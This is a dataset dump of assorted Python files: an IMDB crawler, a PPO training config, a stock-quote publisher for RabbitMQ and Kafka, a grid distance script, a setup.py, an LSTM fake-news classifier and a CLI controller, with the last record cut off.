+{"seq_id": "211339999", "text": "from bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\nfrom urllib.parse import urlparse\nimport requests\nimport collections\nimport os\nimport threading\nimport time\nimport gui_build\nimport people_info\nimport url2img\n\n\nclass CrawlIMDB:\n def __init__(self):\n self.host_name_ = 'http://www.imdb.com' # the base address of the website\n self.seed_url_ = []\n self.seed_url_.append('http://www.imdb.com/name/nm0914612/') # Emma Watson\n #self.seed_url_.append('http://www.imdb.com/name/nm0000129/') # Tom Cruise\n #self.seed_url_.append('http://www.imdb.com/name/nm0000138/') # Leonardo DiCaprio\n\n self.image_count_ = 0\n self.actor_queue_ = collections.deque() # store the temporaty list\n #self.actor_queue = list()\n self.actor_visited_set_ = set() # store the history\n self.movie_visited_set_ = set() # store the history\n self.LoadPreIteration() # load the previous history\n\n # self.max_actor_queue_length_ = 10000\n\n self.actor_queue_lock_ = threading.Lock()\n self.actor_visited_set_lock_ = threading.Lock()\n self.movie_visited_set_lock_ = threading.Lock()\n self.cast_list_strainer_ = SoupStrainer('table', {'class': 'cast_list'}) # for beautiful soup purpose\n self.file_lock_ = threading.Lock()\n self.close_thread_call_ = False\n self.json_file_ = open('../data/people.json', 'a')\n self.time_lock_ = threading.Lock()\n self.save_temp_file_lock_ = threading.Lock()\n\n self.sleep_commend_ = False\n self.sleep_event = threading.Event()\n self.sleep_event.set()\n\n def LoadPreIteration(self):\n if os.path.isfile('./__crawlercache/actor_visited_list.txt'):\n with open('./__crawlercache/actor_visited_list.txt', 'r') as avl_f:\n self.actor_visited_set_ = set(avl_f.read().split('\\n'))\n\n if os.path.isfile('./__crawlercache/movie_visited_list.txt'):\n with open('./__crawlercache/movie_visited_list.txt', 'r') as mvl_f:\n self.movie_visited_set_ = set(mvl_f.read().split('\\n'))\n\n if os.path.isfile('./__crawlercache/actor_visited_list.txt'):\n with open('./__crawlercache/actor_queue.txt', 'r') as avq_f:\n self.actor_queue_ = collections.deque(avq_f.read().split('\\n'))\n\n def RunThread(self, num_of_threading=-1):\n if num_of_threading > len(self.seed_url_) or num_of_threading == -1:\n num_of_threading = len(self.seed_url_)\n self.start_time = time.time()\n for i in range(num_of_threading):\n threading.Thread(target=self.DFSCrawl, args=(self.seed_url_[i],)).start()\n\n gui_build.GUI_Window(self.ExitFunction, self.PauseFunction) # manully exit\n self.ExitFunction()\n\n def DFSCrawl(self, seed_url):\n '''\n :param img_url: the url contain the image of the actor or the actress\n :return:\n '''\n with self.actor_visited_set_lock_, self.actor_queue_lock_:\n if seed_url not in self.actor_visited_set_:\n self.actor_visited_set_.add(seed_url)\n\n self.actor_queue_.append(\n seed_url) # because it is the seed, so it will be pushed here anyway to check if the seed is crawl over or not\n\n while len(self.actor_queue_) > 0:\n if self.close_thread_call_:\n return\n\n self.sleep_event.wait()\n\n with self.time_lock_:\n curr_epsilon = time.time() - self.start_time\n if curr_epsilon > 60 * 60 * 2:\n self.SaveTempData()\n self.start_time = time.time()\n\n with self.actor_queue_lock_:\n curr_actor_url = self.actor_queue_.pop()\n path = urlparse(curr_actor_url).path\n while os.path.dirname(path) != '/':\n path = os.path.dirname(path)\n if path == \"/name\":\n self.CrawActor(curr_actor_url)\n elif path == \"/title\":\n self.CrawMovie(curr_actor_url)\n\n def CrawActor(self, curr_actor_url):\n '''\n :param img_url: the url contain the image of the actor or the actress\n :return:\n '''\n\n try:\n source_code = requests.get(curr_actor_url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"html.parser\")\n\n link = soup.find('img', {'id': 'name-poster'})\n if link:\n # make sure the link is valid, which means this celebrity has a picture\n img_url = link.get('src')\n actor_name = link.get('alt').replace(' Picture', '')\n born_info = soup.find('div', {'id': 'name-born-info'})\n curr_actor_info = people_info.PeopleInfo()\n\n curr_actor_info.SetName(actor_name)\n curr_actor_info.SetLink(curr_actor_url)\n birth_day = \"\"\n birth_year = \"\"\n location = \"\"\n\n if born_info is not None:\n born_info_list = born_info.findAll('a')\n for link in born_info_list:\n curr_href = link.get(\"href\")\n if curr_href.find(\"birth_monthday\") != -1:\n birth_day = link.text\n elif curr_href.find(\"birth_year\") != -1:\n birth_year = link.text\n elif curr_href.find(\"birth_place\") != -1:\n location = link.text\n\n curr_actor_info.SetBirthYear(birth_year)\n curr_actor_info.SetBirthDay(birth_day)\n curr_actor_info.SetLocation(location)\n\n with self.file_lock_:\n curr_actor_info.JsonDump(self.json_file_)\n\n url2img.url2img('../data/IMDB', actor_name, img_url)\n\n # if len(self.actor_queue_) < self.max_actor_queue_length_:\n # if the current queue is larger than the defined maximum length,\n # the program would not adding new link ustil it reduce to the maximum length\n node = soup.find_all('div', {'class': 'filmo-category-section'})\n for item in node:\n films_class = item.find_all('b')\n for single_movie in films_class:\n if self.close_thread_call_:\n return\n self.sleep_event.wait()\n\n # in case the name of the movie is unprintable\n try:\n print(single_movie.text)\n finally:\n pass\n\n movie_url = self.host_name_ + (single_movie.contents[0].get('href'))\n movie_url = self.RemoveQuestionMark(movie_url)\n print(movie_url)\n #with self.actor_queue_lock_:\n self.actor_queue_.append(movie_url)\n #self.CrawMovie(movie_url)\n except:\n print(\"some error encountered\")\n\n def CrawMovie(self, movie_url):\n '''\n :param movie_url: the url contains the list of actors or actresses\n :return:\n '''\n with self.movie_visited_set_lock_:\n if movie_url in self.movie_visited_set_:\n return\n else:\n self.movie_visited_set_.add(movie_url)\n\n self.sleep_event.wait()\n\n source_code = requests.get(movie_url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"html.parser\", parse_only=self.cast_list_strainer_)\n # cast_list = soup.find_all('table',{'class':'cast_list'})\n cast_list_urls = soup.find_all('a', {'itemprop': 'url'})\n for item in cast_list_urls:\n if self.close_thread_call_:\n return\n self.sleep_event.wait()\n\n # if the seeds are changed, the lines below should be commended out\n actor_name = item.text\n\n if actor_name[0] == ' ':\n actor_name = actor_name[1:]\n\n if actor_name[-1] == '\\n':\n actor_name = actor_name[:-1]\n\n actor_url = self.host_name_ + item.get('href')\n actor_url = self.RemoveQuestionMark(actor_url)\n\n self.actor_visited_set_lock_.acquire()\n self.actor_queue_lock_.acquire()\n try:\n if actor_url not in self.actor_visited_set_:\n self.actor_queue_.append(actor_url)\n self.actor_visited_set_.add(actor_url)\n finally:\n self.actor_visited_set_lock_.release()\n self.actor_queue_lock_.release()\n\n def SaveTempData(self):\n with self.save_temp_file_lock_:\n f_actor = open('./__crawlercache/actor_visited_list.txt', 'w')\n f_movie = open('./__crawlercache/movie_visited_list.txt', 'w')\n f_actor_q = open('./__crawlercache/actor_queue.txt', 'w')\n f_actor.write('\\n'.join(self.actor_visited_set_))\n f_movie.write('\\n'.join(self.movie_visited_set_))\n f_actor_q.write('\\n'.join(self.actor_queue_))\n f_actor.close()\n f_movie.close()\n f_actor_q.close()\n\n def RemoveQuestionMark(self, url):\n return url[:url.find('?')]\n\n def ExitFunction(self):\n self.close_thread_call_ = True\n self.sleep_event.set()\n while threading.active_count() > 1:\n time.sleep(0.1)\n self.json_file_.close()\n self.SaveTempData()\n exit()\n\n def PauseFunction(self):\n if self.sleep_event.is_set() is True:\n self.sleep_event.clear()\n print(\"sleep\")\n elif self.sleep_event.is_set() is False:\n self.sleep_event.set()\n print(\"wake\")\n self.SaveTempData()\n\n\nif __name__ == '__main__':\n spider = CrawlIMDB()\n spider.RunThread()\n", "sub_path": "code/DFS_version/web_crawler_imdb.py", "file_name": "web_crawler_imdb.py", "file_ext": "py", "file_size_in_byte": 9936, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.deque", "line_number": 23, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 31, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 32, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 33, "usage_type": "call"}, {"api_name": "bs4.SoupStrainer", "line_number": 34, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 35, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 38, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 39, "usage_type": "call"}, {"api_name": "threading.Event", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 63, "usage_type": "call"}, {"api_name": "gui_build.GUI_Window", "line_number": 65, "usage_type": "call"}, {"api_name": "time.time", "line_number": 87, "usage_type": "call"}, {"api_name": "time.time", "line_number": 90, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 109, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 111, "usage_type": "call"}, {"api_name": "people_info.PeopleInfo", "line_number": 119, "usage_type": "call"}, {"api_name": "url2img.url2img", "line_number": 145, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 186, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 188, "usage_type": "call"}, {"api_name": "threading.active_count", "line_number": 236, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 237, "usage_type": "call"}]}
+{"seq_id": "365165137", "text": "import os\nfrom rainy import Config\nfrom rainy.agent import PpoAgent\nimport rainy.util.cli as cli\nfrom torch.optim import Adam\nfrom rainy.net import ActorCriticNet, DqnConv, LinearHead\nfrom rainy.net.init import Initializer, orthogonal\nfrom rainy.util import Device\nfrom typing import Tuple\n\n\ndef a2c_conv(state_dim: Tuple[int, int, int], action_dim: int, device: Device) -> ActorCriticNet:\n body = DqnConv(\n state_dim,\n kernel_and_strides=[(8, 1), (4, 1), (3, 1)],\n hidden_channels=(32, 64, 32),\n output_dim=256\n )\n ac_head = LinearHead(body.output_dim, action_dim, Initializer(weight_init=orthogonal(0.01)))\n cr_head = LinearHead(body.output_dim, 1)\n return ActorCriticNet(body, ac_head, cr_head, device=device)\n\n\ndef config() -> Config:\n c = Config()\n c.nworkers = 8\n c.set_parallel_env(lambda _env_gen, _num_w: ParallelRogueEnvExt(StairRewardParallel(\n [CONFIG] * c.nworkers,\n max_steps=500,\n stair_reward=50.0,\n image_setting=EXPAND,\n )))\n c.eval_env = RogueEnvExt(StairRewardEnv(\n config_dict=CONFIG,\n max_steps=500,\n stair_reward=50.0,\n image_setting=EXPAND\n ))\n c.set_optimizer(lambda params: Adam(params, lr=2.5e-4, eps=1.0e-4))\n c.set_net_fn('actor-critic', a2c_conv)\n c.max_steps = int(2e7)\n c.grad_clip = 0.5\n c.episode_log_freq = 100\n c.eval_freq = None\n c.eval_deterministic = False\n # ppo parameters\n c.nsteps = 100\n c.value_loss_weight = 0.5\n c.gae_tau = 0.95\n c.use_gae = True\n c.ppo_minibatch_size = 200\n c.ppo_clip = 0.1\n c.lr_decay = True\n return c\n\n\nif __name__ == '__main__':\n cli.run_cli(config(), PpoAgent, script_path=os.path.realpath(__file__))\n", "sub_path": "coinrun/rainy_ppo.py", "file_name": "rainy_ppo.py", "file_ext": "py", "file_size_in_byte": 1738, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Tuple", "line_number": 12, "usage_type": "name"}, {"api_name": "rainy.util.Device", "line_number": 12, "usage_type": "name"}, {"api_name": "rainy.net.DqnConv", "line_number": 13, "usage_type": "call"}, {"api_name": "rainy.net.LinearHead", "line_number": 19, "usage_type": "call"}, {"api_name": "rainy.net.init.Initializer", "line_number": 19, "usage_type": "call"}, {"api_name": "rainy.net.init.orthogonal", "line_number": 19, "usage_type": "call"}, {"api_name": "rainy.net.LinearHead", "line_number": 20, "usage_type": "call"}, {"api_name": "rainy.net.ActorCriticNet", "line_number": 21, "usage_type": "call"}, {"api_name": "rainy.net.ActorCriticNet", "line_number": 12, "usage_type": "name"}, {"api_name": "rainy.Config", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 39, "usage_type": "call"}, {"api_name": "rainy.Config", "line_number": 24, "usage_type": "name"}, {"api_name": "rainy.util.cli.run_cli", "line_number": 58, "usage_type": "call"}, {"api_name": "rainy.agent.PpoAgent", "line_number": 58, "usage_type": "argument"}, {"api_name": "rainy.util.cli", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.realpath", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}]}
+{"seq_id": "331032641", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 9 09:40:23 2019\n\n@author: ArchuBharathi\n\"\"\"\n\nfrom io import StringIO\nimport sys\nfrom nsetools import Nse\nimport pandas as pd\nimport logging\nfrom logging.config import fileConfig\nfrom nsetools import Nse\nimport pika\nimport json\nfrom pika.connection import ConnectionParameters\nfrom pika import credentials as pika_credentials, BasicProperties\nfrom pika.exceptions import AMQPError, ChannelClosed, ConnectionClosed\nimport concurrent.futures\n\n\nclass daily_stock_price_fetcher_mq:\n\n queue_name = \"NSE\"\n queue_count = int(0)\n total_msg_counter = 0\n\n def __init__(self, connection, channel, routingkey):\n\n self.nse = Nse()\n fileConfig('../properties/logging_config.ini')\n self.log = logging.getLogger()\n self.log.debug('Logger intiated ')\n self.connection = connection\n self.channel = channel\n self.routingkey = routingkey\n self._message_number_out = 0\n\n def read_stock_scan_list(self, filename):\n# =============================================================================\n# \"\"\" Read the stock code from files and return a list \"\"\"\n# =============================================================================\n self.log.debug(\"stock file used for scanning :\" + filename)\n linelist = [line.rstrip('\\n') for line in open(filename) if line[:-1]]\n return linelist\n\n def nse_live_fetch(self, stockquote):\n# =============================================================================\n# Fetch Realtime nse stock details\n# NSE.py module is modified please use that changes while updating\n# {PIP install NSE}\n# =============================================================================\n self.log.debug(\"Processing of url :\" + str(stockquote))\n try:\n response_json = self.nse.get_quote(str(stockquote))\n except BaseException as B:\n self.log.info(\"Exception Occured for: \"+str(stockquote)+\":\"+str(B))\n return\n\n self.publish_kafka(str(response_json),stockquote)\n return \"done\"\n\n def get_current_day_quotes(self, stock_scan_list):\n# =============================================================================\n# concurrent processsing of Stock fetch from NSE websites\n# =============================================================================\n self.log.debug(\"Concurrent processing of urls\")\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\n for x in executor.map(self.nse_live_fetch, stock_scan_list):\n pass\n\n return \"done\"\n\n def publish(self, message, stock_code):\n# =============================================================================\n# publish the response to RabbitMQ\n# =============================================================================\n\n self._message_number_out += 1\n daily_stock_price_fetcher_mq.total_msg_counter += 1\n\n if message.isspace():\n\n self.log.info(\"Response EMPTY for stockcode : %s\" % (stock_code))\n return\n\n try:\n self.channel.basic_publish(exchange='NSE',\n #routing_key=self.routingkey,\n routing_key='',\n body=message)\n self.log.debug(\"Publish kafka message #%s ,MSG : %s\" %\n (self._message_number_out, message))\n self.log.info(\"Publish kafka message #%s,StockCode : %s \" %\n (self._message_number_out, stock_code))\n except ChannelClosed:\n\n self.channel.retry_channel()\n self.channel._cached_messages.append(message)\n\n except AMQPError as err:\n\n self.log.info(\"AMQPERROR %s,StockCode : %s \" %\n (err, stock_code))\n self.channel.retry_channel()\n self.channel._cached_messages.append(message)\n\n return\n\n def publish_kafka(self,message,stock_code):\n# =============================================================================\n# publish the response json to Kafka queue\n# =============================================================================\n if message.isspace():\n self.log.info(\"Response EMPTY for stockcode : %s\" % (stock_code))\n return\n\n daily_stock_price_fetcher_mq.total_msg_counter += 1\n\n self._message_number_out += 1\n\n self.connection.send(self.routingkey,message)\n # json.dumps(message).encode('utf-8'))\n\n self.log.debug(\"Publish message #%s ,MSG : %s\" %\n (self._message_number_out, message))\n self.log.info(\"Publish message #%s,StockCode : %s \" %\n (self._message_number_out, stock_code))\n\n def main_workflow(self,filename):\n# =============================================================================\n# Entry method and workflow orchestration method\n# =============================================================================\n\n self.get_current_day_quotes(self.read_stock_scan_list(filename))\n self.log.info(\"All Stocks quotes published for FileId : \"+filename)\n\n return daily_stock_price_fetcher_mq.total_msg_counter\n\n\nif __name__ == \"__main__\":\n dm = daily_stock_price_fetcher_mq()", "sub_path": "stream/daily_stock_price_mq.py", "file_name": "daily_stock_price_mq.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "nsetools.Nse", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.config.fileConfig", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 70, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 70, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 70, "usage_type": "name"}, {"api_name": "pika.exceptions.ChannelClosed", "line_number": 98, "usage_type": "name"}, {"api_name": "pika.exceptions.AMQPError", "line_number": 103, "usage_type": "name"}]}
+{"seq_id": "424487717", "text": "import os, sys\nfrom datetime import datetime\nfrom math import sqrt\n\nfilePath = r'D:\\PythonRMSProjects\\roxarAPI\\\\'\n#startCell = 1 # № ячейки\n#countCell = 14000 #количество ячеек для расчета\nlenLineInFile = 14 #длина строки в файле фиксированная, чтобы можно было вычислить смещение при чтении из него. \n\ntry: \n startCell = int(sys.argv[1])\n countCell = int(sys.argv[2])\nexcept IndexError:\n startCell = 99286\n countCell = 14183\n\n \ndef getLists():\n global ch_prop_value \n file = open(filePath + 'ch_prop_value.txt', 'r')\n file.seek(startCell)\n ch_prop_value = [int(item) for item in list(file.read(countCell))]\n \n file = open(filePath + 'cell_indices.txt', 'r')\n file.seek(startCell * (lenLineInFile + 2)) # длина данных + \\r\\n, отсюда +2 \n cells = file.read(countCell * (lenLineInFile + 1))\n cells = cells.split('\\n')[:-1]\n global cell_indices\n cell_indices = []\n global cell_coord_indices\n cell_coord_indices = {}\n index = 0\n \n for item in cells:\n x = item.split()\n cell_indices.append([int(x[0]), int(x[1]), int(x[2])])\n cell_coord_indices['%s %s %s' % (x[0], x[1], x[2])] = index \n index += 1\n \ndef spCalcDistance():\n for ind in range(countCell):\n if ch_prop_value[ind] == 2:\n wt = 1.0\n else:\n try:\n max = 100\n cell_ind = cell_indices[ind]\n except IndexError:\n print('Index: ', ind)\n raise\n for i in range(-15, 15):\n for j in range(-15, 15):\n if cell_ind[0]+i >=0 and cell_ind[1]+j >=0:\n try:\n index = cell_coord_indices['%s %s %s' % (cell_ind[0]+i, cell_ind[1]+j, cell_ind[2])]\n #if ch_prop_value[gi.get_cell_numbers([cell_ind[0]+i, cell_ind[1]+j, cell_ind[2]])] == 2:\n if ch_prop_value[index] == 2: \n dist = sqrt(i**2 + j**2)\n if dist < max:\n max = dist\n except KeyError:\n #print('KeyError: ', '%s %s %s' % (cell_ind[0]+i, cell_ind[1]+j, cell_ind[2]))\n pass\n \n wt = 1.0 - max/(15*sqrt(2))\n if wt > 1:\n wt = 1\n if wt < 0:\n wt = 0\n #print(ind, wt)\n lWeight.append(wt)\n \nif __name__ == '__main__':\n startTime = datetime.now()\n print('Hello from child %i\\n' % os.getpid(), 'Start time: ', startTime)\n getLists()\n lWeight = []\n \n spCalcDistance()\n with open('%sweight_%s.txt' % (filePath, startCell), 'w') as f:\n f.writelines([str(item) + '\\n' for item in lWeight])\n \n print('Bye from child %i\\n' % os.getpid(), 'End time: ', datetime.now(), 'Duration: ', datetime.now() - startTime) \n", "sub_path": "child.py", "file_name": "child.py", "file_ext": "py", "file_size_in_byte": 3084, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "name"}, {"api_name": "os.getpid", "line_number": 75, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "name"}]}
+{"seq_id": "560785599", "text": "import os\nimport stat\nfrom datetime import datetime\nfrom setuptools import setup\n\ndef read(fname):\n\t return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\ndef most_recent_mod(directory):\n\tmod=0;\n\tfor dirpath, dirnames, filenames in os.walk(directory): \n\t\tfor filename in filenames:\n\t\t\tfname=os.path.join(dirpath,filename)\n\t\t\tstats=os.stat(fname)\n\t\t\tmod=max(mod,stats[stat.ST_MTIME])\n\treturn mod\n\nsrc='src/stagyy'\n\nver=datetime.fromtimestamp(most_recent_mod(src)).strftime('%Y.%m.%d.%H.%M')\n\nsetup(\n\tname='stagyy',\n#\tinstall_requires=['of_xml>=0.0.1','of_util>=0.0.1'],\n\tdescription='Python modules in support of StagYY',\n\tauthor='Robert I. Petersen',\n\tauthor_email='rpetersen@ucsd.edu', \n\tversion='0.5.0',\n\tscripts=['src/scripts/pardiff.py'],\n\tpackage_dir={'stagyy': src},\n\tpackages=['stagyy','stagyy.ic','stagyy.image'], \n\tlicense='GPL 2.0', \n\tclassifiers=[\n'Development Status :: 4 - Beta',\n'Intended Audience :: Developers',\n'License :: OSI Approved :: GNU General Public License (GPL)',\n'Programming Language :: Python'\n\t],\n\tlong_description=read('README')\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1081, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 15, "usage_type": "call"}, {"api_name": "stat.ST_MTIME", "line_number": 16, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "127268223", "text": "import tensorflow as tf\nfrom tensorflow import keras\nfrom keras.preprocessing.text import one_hot\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Embedding,RNN,LSTM,Dense\nfrom keras import Sequential\nimport numpy as np\nimport math\nimport pandas as pd\n\ndf=pd.read_csv(r\"Fake.csv\",names=[\"title\",\"text\",\"sub\",\"date\"])\n\nx=[]\ny=[]\n\n\nfor i in range(1,501):\n x.append(df.text[i])\n y.append([0,1])\n \nx_train=np.array(x[0:400])\nx_test=np.array(x[400:500])\ny_train=np.array(y[0:400])\ny_test=np.array(y[400:500])\n\n\ndf=pd.read_csv(r\"\\True.csv\",names=[\"title\",\"text\",\"sub\",\"date\"])\n\n\nx=[]\ny=[]\nfor i in range(1,501):\n x.append(df.text[i])\n y.append([1,0])\n\nx_train=np.append(x_train,x[0:400],axis=0)\nx_test=np.append(x_test,x[400:500],axis=0)\n\nprint(x_train.shape)\n\ny_train=np.append(y_train,y[0:400],axis=0)\ny_test=np.append(y_test,y[400:500],axis=0)\n\n\nvocab_size=50\n\nencoded_docs=[one_hot(d,vocab_size) for d in np.array(x_train)]\npadded_docs=pad_sequences(encoded_docs,100,padding='post')\n\nprint(padded_docs)\nembed_dim = 128\nlstm_out = 200\n#batch_size = 32\n\nmodel = Sequential()\nmodel.add(Embedding(embed_dim, embed_dim,input_length = padded_docs.shape[1], dropout = 0.2))\nmodel.add(LSTM(lstm_out, dropout_U = 0.2, dropout_W = 0.2))\n\nmodel.add(Dense(2,activation='softmax')) \nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics = ['accuracy'])\nprint(model.summary())\n\nencoded_test=[one_hot(d,vocab_size) for d in x_test]\npadded_test=pad_sequences(encoded_test,100,padding='post')\n\n# fit model\nmodel.fit(padded_docs, y_train, epochs=2, verbose=0)\n\n#test model\ny=model.predict(padded_test)\nerr=0\n#print(y_test)\nl=y_test.shape[0]\n\nfor i in range(l):\n if y[i][0]>y[i][1]:\n y[i][0]=1\n y[i][1]=0\n else:\n y[i][0]=0\n y[i][1]=1\n err+=(y_test[i][0]-y[i][0]+y_test[i][0]-y[i][0])/2\nerr=err/l\nacc=1-err \nprint(\"Accuracy: \",acc*100,\"%\")\ninput=None\nprint(input)\ninp=input(\"Enter A News To Test: \")\ninp=np.array([inp])\nencoded_test=[one_hot(d,vocab_size) for d in inp]\npadded_test=pad_sequences(encoded_test,100,padding='post')\noutput=model.predict(padded_test)\nif(output[0][0]>output[0][1]):\n print(\"True News!!! Wow\")\nelse:\n print(\"Oops!!! Fake News\")\n", "sub_path": "Fake_News_Detection.py", "file_name": "Fake_News_Detection.py", "file_ext": "py", "file_size_in_byte": 2246, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.one_hot", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.one_hot", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.one_hot", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "374142221", "text": "import sys\n\nfrom cement.core.foundation import CementApp\nfrom cement.ext.ext_colorlog import ColorLogHandler\nfrom cement.core.controller import CementBaseController, expose\nfrom fusion.src.core.builder import builder_factory\n\nclass FusionBaseController(CementBaseController):\n class Meta:\n label = 'base'\n description = \"Fusion CLI interacts with software integration & delivery pipeline\"\n\nclass InitController(CementBaseController):\n class Meta:\n label = 'init'\n description = \"Initialize Environment\"\n stacked_on = 'base'\n stacked_type = 'nested'\n arguments=[\n (['--type'], dict(help='Resource type', action='store', required=True)),\n (['--url'], dict(help='Resource URL', action='store', required=True)),\n (['--token'], dict(help='Access Token', action='store', required=True)),\n ]\n\n @expose(hide=True)\n def default(self):\n self.app.log.info(\"TODO: Prompt user for required configuration.\")\n pass\n\n @expose(help=\"Initialize builder\")\n def builder(self):\n type = self.app.pargs.type\n url = self.app.pargs.url\n token = self.app.pargs.token\n builder = builder_factory(type=type, app=self.app)\n builder.create(url=url, token=token)\n\n @expose(help=\"Initialize provisioner\")\n def provisioner(self):\n self.app.log.info(\"#TODO: Initialize provisioner\")\n\n @expose(help=\"Initialize code repository\")\n def code_repository(self):\n self.app.log.info(\"#TODO: Initialize code repository\")\n\n\nclass FusionApp(CementApp):\n class Meta:\n label = 'fusion'\n extensions = ['colorlog']\n log_handler = ColorLogHandler(colors={'DEBUG': '',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'yellow,bg_red'})\n handlers = [FusionBaseController, InitController]", "sub_path": "fusion/src/cli/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 2059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cement.core.controller.CementBaseController", "line_number": 8, "usage_type": "name"}, {"api_name": "cement.core.controller.CementBaseController", "line_number": 13, "usage_type": "name"}, {"api_name": "cement.core.controller.expose", "line_number": 25, "usage_type": "call"}, {"api_name": "fusion.src.core.builder.builder_factory", "line_number": 35, "usage_type": "call"}, {"api_name": "cement.core.controller.expose", "line_number": 30, "usage_type": "call"}, {"api_name": 